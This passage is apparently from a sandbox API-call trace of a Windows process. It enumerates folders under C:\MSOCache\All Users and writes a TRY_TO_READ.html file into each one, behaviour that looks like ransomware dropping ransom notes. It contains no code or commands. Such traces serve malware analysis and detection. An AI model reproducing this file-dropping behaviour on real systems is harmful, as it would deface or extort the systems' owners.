	[0052.058] WriteFile (in: hFile=0x444, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0052.058] CloseHandle (hObject=0x444) returned 1
	[0052.058] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.058] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0052.058] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0052.058] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588ef8 | out: hHeap=0x540000) returned 1
	[0052.058] FindNextFileW (in: hFindFile=0x575760, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0019-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9877A~1")) returned 1
	[0052.058] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0052.058] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.058] GetLastError () returned 0x0
	[0052.058] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588d60
	[0052.058] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.058] GetLastError () returned 0x0
	[0052.058] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5a1038
	[0052.058] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5832a8
	[0052.058] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a1038 | out: hHeap=0x540000) returned 1
	[0052.058] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5832a8 | out: hHeap=0x540000) returned 1
	[0052.058] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588ef8
	[0052.058] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596dc8
	[0052.058] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588f80
	[0052.058] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596760
	[0052.058] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596770
	[0052.058] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.058] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589008
	[0052.059] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.059] GetLastError () returned 0x0
	[0052.059] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5919d0
	[0052.059] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589008 | out: hHeap=0x540000) returned 1
	[0052.059] GetLastError () returned 0x0
	[0052.059] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb0) returned 0x598d40
	[0052.059] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444
	[0052.061] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598d40 | out: hHeap=0x540000) returned 1
	[0052.061] WriteFile (in: hFile=0x444, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0052.062] WriteFile (in: hFile=0x444, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0052.062] WriteFile (in: hFile=0x444, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0052.062] CloseHandle (hObject=0x444) returned 1
	[0052.062] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.062] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0052.063] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0052.063] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588f80 | out: hHeap=0x540000) returned 1
	[0052.063] FindNextFileW (in: hFindFile=0x575760, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-001A-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9765F~1")) returned 1
	[0052.063] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0052.063] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.063] GetLastError () returned 0x0
	[0052.063] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588d60
	[0052.063] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.063] GetLastError () returned 0x0
	[0052.063] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5a1038
	[0052.063] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5832a8
	[0052.063] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a1038 | out: hHeap=0x540000) returned 1
	[0052.063] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5832a8 | out: hHeap=0x540000) returned 1
	[0052.063] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588f80
	[0052.063] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596da0
	[0052.063] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589008
	[0052.063] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596760
	[0052.063] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596770
	[0052.063] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.063] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589090
	[0052.063] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.063] GetLastError () returned 0x0
	[0052.063] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5919d0
	[0052.063] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589090 | out: hHeap=0x540000) returned 1
	[0052.063] GetLastError () returned 0x0
	[0052.063] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb0) returned 0x598d40
	[0052.063] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444
	[0052.066] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598d40 | out: hHeap=0x540000) returned 1
	[0052.066] WriteFile (in: hFile=0x444, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0052.067] WriteFile (in: hFile=0x444, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0052.067] WriteFile (in: hFile=0x444, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0052.067] CloseHandle (hObject=0x444) returned 1
	[0052.067] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.067] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0052.067] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0052.067] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589008 | out: hHeap=0x540000) returned 1
	[0052.067] FindNextFileW (in: hFindFile=0x575760, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-001B-0409-1000-0000000FF1CE}-C", cAlternateFileName="{94E50~1")) returned 1
	[0052.067] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0052.067] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.067] GetLastError () returned 0x0
	[0052.067] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588d60
	[0052.067] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.067] GetLastError () returned 0x0
	[0052.067] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5a1038
	[0052.067] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5832a8
	[0052.067] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a1038 | out: hHeap=0x540000) returned 1
	[0052.067] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5832a8 | out: hHeap=0x540000) returned 1
	[0052.067] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589008
	[0052.067] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a58f0
	[0052.067] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589090
	[0052.067] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596760
	[0052.068] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596770
	[0052.068] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.068] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589118
	[0052.068] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.068] GetLastError () returned 0x0
	[0052.068] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5919d0
	[0052.068] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589118 | out: hHeap=0x540000) returned 1
	[0052.068] GetLastError () returned 0x0
	[0052.068] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb0) returned 0x598d40
	[0052.068] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444
	[0052.070] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598d40 | out: hHeap=0x540000) returned 1
	[0052.070] WriteFile (in: hFile=0x444, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0052.071] WriteFile (in: hFile=0x444, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0052.071] WriteFile (in: hFile=0x444, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0052.071] CloseHandle (hObject=0x444) returned 1
	[0052.071] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.071] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0052.071] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0052.071] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589090 | out: hHeap=0x540000) returned 1
	[0052.071] FindNextFileW (in: hFindFile=0x575760, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-002C-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92787~1")) returned 1
	[0052.071] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0052.071] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.071] GetLastError () returned 0x0
	[0052.071] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588d60
	[0052.071] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.071] GetLastError () returned 0x0
	[0052.071] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5a1038
	[0052.072] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5832a8
	[0052.072] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a1038 | out: hHeap=0x540000) returned 1
	[0052.072] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5832a8 | out: hHeap=0x540000) returned 1
	[0052.072] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589090
	[0052.072] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a58a0
	[0052.072] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589118
	[0052.072] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596760
	[0052.072] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596770
	[0052.072] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.072] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5891a0
	[0052.072] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.072] GetLastError () returned 0x0
	[0052.072] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5919d0
	[0052.072] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5891a0 | out: hHeap=0x540000) returned 1
	[0052.072] GetLastError () returned 0x0
	[0052.072] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb0) returned 0x598d40
	[0052.072] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444
	[0052.083] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598d40 | out: hHeap=0x540000) returned 1
	[0052.083] WriteFile (in: hFile=0x444, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0052.084] WriteFile (in: hFile=0x444, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0052.084] WriteFile (in: hFile=0x444, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0052.084] CloseHandle (hObject=0x444) returned 1
	[0052.084] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.084] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0052.084] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0052.084] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589118 | out: hHeap=0x540000) returned 1
	[0052.084] FindNextFileW (in: hFindFile=0x575760, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0043-0409-1000-0000000FF1CE}-C", cAlternateFileName="{95310~1")) returned 1
	[0052.084] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0052.084] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.084] GetLastError () returned 0x0
	[0052.084] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588d60
	[0052.084] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.084] GetLastError () returned 0x0
	[0052.084] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5a1038
	[0052.085] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5832a8
	[0052.085] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a1038 | out: hHeap=0x540000) returned 1
	[0052.085] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5832a8 | out: hHeap=0x540000) returned 1
	[0052.085] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589118
	[0052.085] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5850
	[0052.085] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5891a0
	[0052.085] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596760
	[0052.085] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596770
	[0052.085] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.085] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589228
	[0052.085] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.085] GetLastError () returned 0x0
	[0052.085] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5919d0
	[0052.085] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589228 | out: hHeap=0x540000) returned 1
	[0052.085] GetLastError () returned 0x0
	[0052.085] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb0) returned 0x598d40
	[0052.085] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444
	[0052.087] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598d40 | out: hHeap=0x540000) returned 1
	[0052.087] WriteFile (in: hFile=0x444, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0052.088] WriteFile (in: hFile=0x444, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0052.088] WriteFile (in: hFile=0x444, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0052.088] CloseHandle (hObject=0x444) returned 1
	[0052.089] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.089] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0052.089] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0052.089] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5891a0 | out: hHeap=0x540000) returned 1
	[0052.089] FindNextFileW (in: hFindFile=0x575760, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0044-0409-1000-0000000FF1CE}-C", cAlternateFileName="{91454~1")) returned 1
	[0052.089] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0052.089] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.089] GetLastError () returned 0x0
	[0052.089] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588d60
	[0052.089] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.089] GetLastError () returned 0x0
	[0052.089] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5a1038
	[0052.089] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5832a8
	[0052.089] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a1038 | out: hHeap=0x540000) returned 1
	[0052.089] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5832a8 | out: hHeap=0x540000) returned 1
	[0052.089] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5891a0
	[0052.089] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5800
	[0052.089] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589228
	[0052.089] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596760
	[0052.089] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596770
	[0052.089] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.089] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5892b0
	[0052.089] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.089] GetLastError () returned 0x0
	[0052.089] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5919d0
	[0052.089] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5892b0 | out: hHeap=0x540000) returned 1
	[0052.089] GetLastError () returned 0x0
	[0052.089] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb0) returned 0x598d40
	[0052.089] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444
	[0052.093] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598d40 | out: hHeap=0x540000) returned 1
